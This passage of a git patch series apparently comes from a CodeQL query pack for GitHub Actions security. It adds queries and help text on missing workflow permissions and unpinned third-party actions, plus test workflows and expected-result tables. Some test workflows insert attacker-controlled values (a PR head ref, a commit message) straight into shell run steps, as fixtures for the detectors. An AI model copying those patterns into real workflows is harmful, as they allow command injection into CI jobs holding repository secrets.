+ run: | + echo "is_wish_list="$(dotnet run -p ./IssuesTypePredicter/IssuesTypePredicterML.ConsoleApp/IssuesTypePredicterML.ConsoleApp.csproj -v q "${{ env.issue_json_string }}")"" >> $GITHUB_ENV + + # If the is_wish_list variable contains 1, label the issue as "Wishlist" + - name: Label issue as 'Wishlist' + if: env.analysis_response == 'Valid' && contains(env.is_wish_list, 'IsWishlist:1') + env: + GH_TOKEN: ${{ secrets.DYNAMO_ISSUES_TOKEN }} + run: | + gh issue edit ${{ github.event.issue.number }} --add-label "Wishlist" --repo ${{ github.repository }} + + # If the issue is missing important information (don't follow the template structure), label the issue as "NotMLEvaluated" + - name: Label issue as 'NotMLEvaluated' + if: env.analysis_response != 'Valid' || env.issue_json_string == '' + env: + GH_TOKEN: ${{ secrets.DYNAMO_ISSUES_TOKEN }} + run: | + gh issue edit ${{ github.event.issue.number }} --add-label "NotMLEvaluated" --repo ${{ github.repository }} diff --git a/ql/src/test/.github/workflows/cross3.yml b/ql/src/test/.github/workflows/cross3.yml new file mode 100644 index 000000000000..21ee9ca7f61d --- /dev/null +++ b/ql/src/test/.github/workflows/cross3.yml @@ -0,0 +1,67 @@ +# cherry-picking.yaml (https://github.com/Bughalla/dynamods_dynamo/blob/1c1d3e29ee9bca81b43d78f22bf953100ef67009/.github/workflows/disabled/cherry-picking.yaml#L45-L51) +#DYN-3364 +#This action is disabled for now due to it not behaving as expected +name: Cherry picking +on: + push: + branches: + - master +jobs: + cherry_pick: + runs-on: ubuntu-latest + env: + #Variable for the name of the branch to cherry-pick into. + #It will remain 'invalid' if no branch is specified + destination_branch: 'invalid' + #Name of the autogenerated branch to create the PR from + auto_branch: 'auto-${{github.event.after}}' + #Username for the cherrypick + user_name: "Dynamo-Bot" + steps: + - name: checkout + uses: actions/checkout@v3 + + #Removes posible conflicting characters on the commit message + #This is because the content of the message will be passed to a script as a parameter and quotation marks will split the text as if it where multiple parameters. + - name: Remove conflicting chars + uses: frabert/replace-string-action@v1.2 + id: remove_quotations + with: + pattern: "\"" + string: ${{github.event.commits[0].message}} + replace-with: "-" + flags: g + + #Checks the message looking for a cherry-pick request and extracts the target branch name + - name: Check Information + env: + ISSUE_BODY_PARSED: ${{steps.remove_quotations.outputs.replaced}} + id: check-info + run: | + echo "destination_branch=$(pwsh .\\.github\\scripts\\cherry_pick_check.ps1 "${{ env.ISSUE_BODY_PARSED }}" )" >> $GITHUB_ENV + + #If a target branch was found will run the action + - if: env.destination_branch != 'invalid' + name: Create PR to branch + run: | + git config user.name "${{env.user_name}}" + git fetch --all + git checkout -b ${{env.auto_branch}} origin/${{env.destination_branch}} + git cherry-pick -x ${{github.event.after}} --strategy-option theirs + git push -u origin ${{env.auto_branch}} + hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m "${{env.pr_message}}" + env: + #Token used for the pull request. Corresponds to the DynamoBot account + GITHUB_TOKEN: ${{secrets.DYNAMOBOTTOKEN}} + ISSUE_BODY_PARSED: ${{steps.remove_quotations.outputs.replaced}} + #This represents the title and description of the pr in Markdown format + #Everything before the first blank line will be the title + #Everything after will be included in the description + pr_message: | + Cherry-Pick from commit: ${{github.event.after}} + + ### Cherry-picking: + [Commit](https://github.com/DynamoDS/Dynamo/commit/${{github.event.after}}) + + ### Pull request: + ${{ env.ISSUE_BODY_PARSED }} From fe976faf6ace6067fb39368a0bdedb92473a3e0e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 27 Feb 2024 15:20:35 +0100 Subject: [PATCH 075/707] feat(queries): Migrate queries from AdvancedSecurity repo --- ql/lib/codeql/actions/Ast.qll | 10 +++-- .../dataflow/internal/DataFlowPrivate.qll | 4 +- ql/src/Security/CWE-094/UntrustedCheckout.md | 0 ql/src/Security/CWE-094/UntrustedCheckout.ql | 1 + .../CWE-275/MissingActionsPermissions.md | 22 ++++++++++ .../CWE-275/MissingActionsPermissions.ql | 23 ++++++++++ ql/src/Security/CWE-829/UnpinnedActionsTag.md | 44 +++++++++++++++++++ ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 38 ++++++++++++++++ ql/src/test/.github/workflows/cross1.yml | 1 + ql/src/test/.github/workflows/cross2.yml | 1 + ql/src/test/.github/workflows/cross3.yml | 1 + 11 files changed, 139 insertions(+), 6 deletions(-) create mode 100644 ql/src/Security/CWE-094/UntrustedCheckout.md create mode 100644 ql/src/Security/CWE-275/MissingActionsPermissions.md create mode 100644 ql/src/Security/CWE-275/MissingActionsPermissions.ql create mode 100644 ql/src/Security/CWE-829/UnpinnedActionsTag.md create mode 100644 ql/src/Security/CWE-829/UnpinnedActionsTag.ql diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index fd66acf530d8..2a506f2100c1 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -54,8 +54,6 @@ class CompositeActionStmt extends Statement instanceof Actions::CompositeAction InputsStmt getInputsStmt() { result = this.(YamlMapping).lookup("inputs") } OutputsStmt getOutputsStmt() { result = this.(YamlMapping).lookup("outputs") } - - string getName() { result = this.getLocation().getFile().getRelativePath() } } class RunsStmt extends Statement instanceof Actions::Runs { @@ -68,6 +66,8 @@ class RunsStmt extends Statement instanceof Actions::Runs { * A Github Actions Workflow */ class WorkflowStmt extends Statement instanceof Actions::Workflow { + string getName() { result = super.getName() } + JobStmt getAJobStmt() { result = super.getJob(_) } JobStmt getJobStmt(string id) { result = super.getJob(id) } @@ -79,6 +79,8 @@ class WorkflowStmt extends Statement instanceof Actions::Workflow { string getATriggerEvent() { exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(result)) } + + Statement getPermissionsStmt() { result = this.(YamlMapping).lookup("permissions") } } class ReusableWorkflowStmt extends WorkflowStmt { @@ -91,8 +93,6 @@ class ReusableWorkflowStmt extends WorkflowStmt { InputsStmt getInputsStmt() { result = workflow_call.(YamlMapping).lookup("inputs") } OutputsStmt getOutputsStmt() { result = workflow_call.(YamlMapping).lookup("outputs") } - - string getName() { result = this.getLocation().getFile().getRelativePath() } } class InputsStmt extends Statement instanceof YamlMapping { @@ -189,6 +189,8 @@ class JobStmt extends Statement instanceof Actions::Job { } IfStmt getIfStmt() { result = super.getIf() } + + Statement getPermissionsStmt() { result = this.(YamlMapping).lookup("permissions") } } /** diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index de88c39c2d53..43239e29485d 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -83,10 +83,10 @@ class DataFlowCallable instanceof Cfg::CfgScope { string getName() { if this instanceof ReusableWorkflowStmt - then result = this.(ReusableWorkflowStmt).getName() + then result = this.(ReusableWorkflowStmt).getLocation().getFile().getRelativePath() else if this instanceof CompositeActionStmt - then result = this.(CompositeActionStmt).getName() + then result = this.(CompositeActionStmt).getLocation().getFile().getRelativePath() else none() } } diff --git a/ql/src/Security/CWE-094/UntrustedCheckout.md b/ql/src/Security/CWE-094/UntrustedCheckout.md new file mode 100644 index 000000000000..e69de29bb2d1 diff --git a/ql/src/Security/CWE-094/UntrustedCheckout.ql b/ql/src/Security/CWE-094/UntrustedCheckout.ql index 9c9b5f9eb26a..bb6c0d9a029f 100644 --- a/ql/src/Security/CWE-094/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-094/UntrustedCheckout.ql @@ -6,6 +6,7 @@ * @kind problem * @problem.severity warning * @precision low + * @security-severity 9.3 * @id actions/untrusted-checkout * @tags actions * security diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.md b/ql/src/Security/CWE-275/MissingActionsPermissions.md new file mode 100644 index 000000000000..5c0e433c5cb5 --- /dev/null +++ b/ql/src/Security/CWE-275/MissingActionsPermissions.md @@ -0,0 +1,22 @@ +# Actions Job and Workflow Permissions are not set + +A GitHub Actions job or workflow hasn't set permissions to restrict privileges to the workflow job. +A workflow job by default without the `permissions` key or a root workflow `permissions` will run with all the permissions which can be given to a workflow. + +## Recommendation + +Add the `permissions` key to the job or workflow (applied to all jobs) and set the permissions to the least privilege required to complete the task: + +```yaml +name: "My workflow" +permissions: + contents: read + pull-requests: write + +# or +jobs: + my-job: + permissions: + contents: read + pull-requests: write +``` diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.ql b/ql/src/Security/CWE-275/MissingActionsPermissions.ql new file mode 100644 index 000000000000..a4cecf18b789 --- /dev/null +++ b/ql/src/Security/CWE-275/MissingActionsPermissions.ql @@ -0,0 +1,23 @@ +/** + * @name Workflow does not contain permissions + * @description Workflows should contain permissions to provide a clear understanding has permissions to run the workflow. + * @kind problem + * @security-severity 5.0 + * @problem.severity warning + * @precision high + * @id actions/missing-workflow-permissions + * @tags actions + * maintainability + * external/cwe/cwe-275 + */ + +import actions + +from WorkflowStmt workflow, JobStmt job +where + job = workflow.getAJobStmt() and + ( + not exists(workflow.getPermissionsStmt()) and + not exists(job.getPermissionsStmt()) + ) +select job, "Actions Job or Workflow does not set permissions" diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.md b/ql/src/Security/CWE-829/UnpinnedActionsTag.md new file mode 100644 index 000000000000..855773e6a31b --- /dev/null +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.md @@ -0,0 +1,44 @@ +# Unpinned tag for 3rd party Action in workflow + +The individual jobs in a GitHub Actions workflow can interact with (and compromise) other jobs. For example, a job querying the environment variables used by a later job, writing files to a shared directory that a later job processes, or even more directly by interacting with the Docker socket and inspecting other running containers and executing commands in them. This means that a compromise of a single action within a workflow can be very significant, as that compromised action would have access to all secrets configured on your repository, and may be able to use the `GITHUB_TOKEN` to write to the repository. Consequently, there is significant risk in sourcing actions from third-party repositories on GitHub. For information on some of the steps an attacker could take, see "Security hardening for GitHub Actions." + +## Recommendation + +Pin an action to a full length commit SHA. This is currently the only way to use an action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload. When selecting a SHA, you should verify it is from the action's repository and not a repository fork. + +## Example + +In this example, the Actions workflow uses an unpinned version. + +```yaml +name: "Unpinned Action Example" + +jobs: + build: + steps: + - name: Checkout repository + uses: actions-third-party-mirror/checkout@v3 + + - run: | + ./build.sh +``` + +The Action is pinned in the example below. + +```yaml +name: "Pinned Action Example" + +jobs: + build: + steps: + - name: Checkout repository + uses: actions-mirror-third-party/checkout@ac593985615ec2ede58e132d2e21d2b1cbd6127c + + - run: | + ./build.sh +``` + +## References + +- GitHub: [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions) +- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html). diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql new file mode 100644 index 000000000000..12bc06481bed --- /dev/null +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -0,0 +1,38 @@ +/** + * @name Unpinned tag for 3rd party Action in workflow + * @description Using a tag for a 3rd party Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack. + * @kind problem + * @security-severity 5.0 + * @problem.severity warning + * @precision high + * @id actions/unpinned-tag + * @tags security + * actions + * external/cwe/cwe-829 + */ + +import actions + +bindingset[version] +private predicate isPinnedCommit(string version) { version.regexpMatch("^[A-Fa-f0-9]{40}$") } + +bindingset[repo] +private predicate isTrustedOrg(string repo) { + exists(string org | org in ["actions", "github", "advanced-security"] | repo.matches(org + "/%")) +} + +from StepUsesExpr uses, string repo, string version, WorkflowStmt workflow, string name +where + uses.getCallee() = repo and + uses.getVersion() = version and + uses.getEnclosingWorkflowStmt() = workflow and + ( + workflow.getName() = name + or + not exists(workflow.getName()) and workflow.getLocation().getFile().getBaseName() = name + ) and + not isPinnedCommit(version) and + not isTrustedOrg(repo) +select uses, + "Unpinned 3rd party Action '" + name + "' step $@ uses '" + repo + "' with ref '" + version + + "', not a pinned commit hash", uses, uses.toString() diff --git a/ql/src/test/.github/workflows/cross1.yml b/ql/src/test/.github/workflows/cross1.yml index 9927aca8c563..946497250e6f 100644 --- a/ql/src/test/.github/workflows/cross1.yml +++ b/ql/src/test/.github/workflows/cross1.yml @@ -3,6 +3,7 @@ name: Issue Workflow on: issues: types: [opened,edited] +permissions: {} jobs: #This job will check the issue to determine if it should be moved to a different repository redirectIssue: diff --git a/ql/src/test/.github/workflows/cross2.yml b/ql/src/test/.github/workflows/cross2.yml index ae24e21560b4..ef8269151d73 100644 --- a/ql/src/test/.github/workflows/cross2.yml +++ b/ql/src/test/.github/workflows/cross2.yml @@ -2,6 +2,7 @@ name: Issue Type Predicter # This workflow uses https://github.com/DynamoDS/IssuesTypePredicter to predict the type of a github issue +permissions: {} on: issues: types: [opened, edited] diff --git a/ql/src/test/.github/workflows/cross3.yml b/ql/src/test/.github/workflows/cross3.yml index 21ee9ca7f61d..ddb98c670c75 100644 --- a/ql/src/test/.github/workflows/cross3.yml +++ b/ql/src/test/.github/workflows/cross3.yml @@ -6,6 +6,7 @@ on: push: branches: - master +permissions: {} jobs: cherry_pick: runs-on: ubuntu-latest From 8e7e5d03a5b4ae096c9f6ad5a8c52684fc214681 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 28 Feb 2024 11:15:38 +0100 Subject: [PATCH 076/707] fix(test): Add expected files --- build-dbs.sh | 5 - ql/lib/test/test.expected | 378 +++++++++++++++++++++++++++++++++++ ql/src/test/partial.expected | 28 +++ ql/src/test/test.expected | 152 ++++++++++++++ 4 files changed, 558 insertions(+), 5 deletions(-) delete mode 100755 build-dbs.sh create mode 100644 ql/lib/test/test.expected create mode 100644 ql/src/test/partial.expected create mode 100644 ql/src/test/test.expected diff --git a/build-dbs.sh b/build-dbs.sh deleted file mode 100755 index 073fcc40b441..000000000000 --- a/build-dbs.sh +++ /dev/null @@ -1,5 +0,0 @@ -#!/bin/bash -rm -rf ql/src/test/test.testproj || true -rm -rf ql/lib/test/test.testproj || true -codeql database create ql/src/test/test.testproj -l yaml -s ql/src/test -codeql database create ql/lib/test/test.testproj -l yaml -s ql/lib/test diff --git a/ql/lib/test/test.expected b/ql/lib/test/test.expected new file mode 100644 index 000000000000..4007e6454ea4 --- /dev/null +++ b/ql/lib/test/test.expected @@ -0,0 +1,378 @@ +files +| .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | +yamlNodes +| .github/workflows/test.yml:1:1:1:2 | on | +| .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:1:5:1:8 | push | +| .github/workflows/test.yml:3:1:3:4 | jobs | +| .github/workflows/test.yml:4:3:4:6 | job1 | +| .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:5:5:5:11 | runs-on | +| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | +| .github/workflows/test.yml:7:5:7:11 | outputs | +| .github/workflows/test.yml:8:7:8:16 | job_output | +| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:10:5:10:9 | steps | +| .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:11:9:11:12 | uses | +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | +| .github/workflows/test.yml:12:9:12:12 | with | +| .github/workflows/test.yml:13:11:13:21 | fetch-depth | +| .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | +| .github/workflows/test.yml:13:24:13:24 | 0 | +| .github/workflows/test.yml:15:9:15:12 | name | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | +| .github/workflows/test.yml:16:9:16:10 | id | +| .github/workflows/test.yml:16:13:16:18 | source | +| .github/workflows/test.yml:17:9:17:12 | uses | +| .github/workflows/test.yml:17:15:17:42 | tj-acti ... les@v40 | +| .github/workflows/test.yml:19:9:19:12 | name | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:19:15:19:43 | Remove ... d files | +| .github/workflows/test.yml:20:9:20:10 | id | +| .github/workflows/test.yml:20:13:20:16 | step | +| .github/workflows/test.yml:21:9:21:12 | uses | +| .github/workflows/test.yml:21:15:21:55 | mad9000 ... tring@3 | +| .github/workflows/test.yml:22:9:22:12 | with | +| .github/workflows/test.yml:23:11:23:16 | source | +| .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:24:11:24:14 | find | +| .github/workflows/test.yml:24:17:24:21 | "foo" | +| .github/workflows/test.yml:25:11:25:17 | replace | +| .github/workflows/test.yml:25:20:25:21 | "" | +| .github/workflows/test.yml:26:9:26:10 | id | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | +| .github/workflows/test.yml:27:9:27:11 | run | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:28:10 | id | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | +| .github/workflows/test.yml:29:9:29:11 | run | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:31:3:31:6 | job2 | +| .github/workflows/test.yml:32:5:32:11 | runs-on | +| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | +| .github/workflows/test.yml:34:5:34:6 | if | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:36:5:36:9 | needs | +| .github/workflows/test.yml:36:12:36:15 | job1 | +| .github/workflows/test.yml:38:5:38:9 | steps | +| .github/workflows/test.yml:39:7:40:53 | - id: sink | +| .github/workflows/test.yml:39:9:39:10 | id | +| .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:39:13:39:16 | sink | +| .github/workflows/test.yml:40:9:40:11 | run | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +jobNodes +| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +stepNodes +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:39:9:40:53 | id: sink | +allUsesNodes +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +stepUsesNodes +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +jobUsesNodes +usesSteps +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | fetch-depth | .github/workflows/test.yml:13:24:13:24 | 0 | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | find | .github/workflows/test.yml:24:17:24:21 | "foo" | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | replace | .github/workflows/test.yml:25:20:25:21 | "" | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | source | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +runSteps1 +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | id: sink | echo ${{needs.job1.outputs.job_output}} | +runSteps2 +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +runStepChildren +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:9:26:10 | id | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:27:9:27:11 | run | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:28:9:28:10 | id | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:29:9:29:11 | run | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:9:39:10 | id | +| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:13:39:16 | sink | +| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:9:40:11 | run | +| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +varAccesses +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | steps.step.outputs.value | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | github.event.pull_request.head.ref | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | always() | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | needs.job1.outputs.job_output | +orphanVarAccesses +nonOrphanVarAccesses +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | steps.step.outputs.value | .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | steps.source.outputs.all_changed_files | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | github.event.pull_request.head.ref | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | always() | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | needs.job1.outputs.job_output | .github/workflows/test.yml:39:9:40:53 | id: sink | +parentNodes +| .github/workflows/test.yml:1:1:1:2 | on | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:3:1:3:4 | jobs | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:4:3:4:6 | job1 | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:4:3:40:53 | job1: | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:5:11 | runs-on | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:7:5:7:11 | outputs | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:8:7:8:16 | job_output | .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | +| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | +| .github/workflows/test.yml:10:5:10:9 | steps | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:11:9:11:12 | uses | .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:12:9:12:12 | with | .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:13:11:13:21 | fetch-depth | .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | +| .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | +| .github/workflows/test.yml:15:9:15:12 | name | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:16:9:16:10 | id | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:17:9:17:12 | uses | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:17:15:17:42 | tj-acti ... les@v40 | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:19:9:19:12 | name | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:19:15:19:43 | Remove ... d files | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:20:9:20:10 | id | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:21:9:21:12 | uses | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:21:15:21:55 | mad9000 ... tring@3 | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:22:9:22:12 | with | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:23:11:23:16 | source | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:24:11:24:14 | find | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:24:17:24:21 | "foo" | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:25:11:25:17 | replace | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:25:20:25:21 | "" | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:26:9:26:10 | id | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:27:9:27:11 | run | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:28:9:28:10 | id | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| 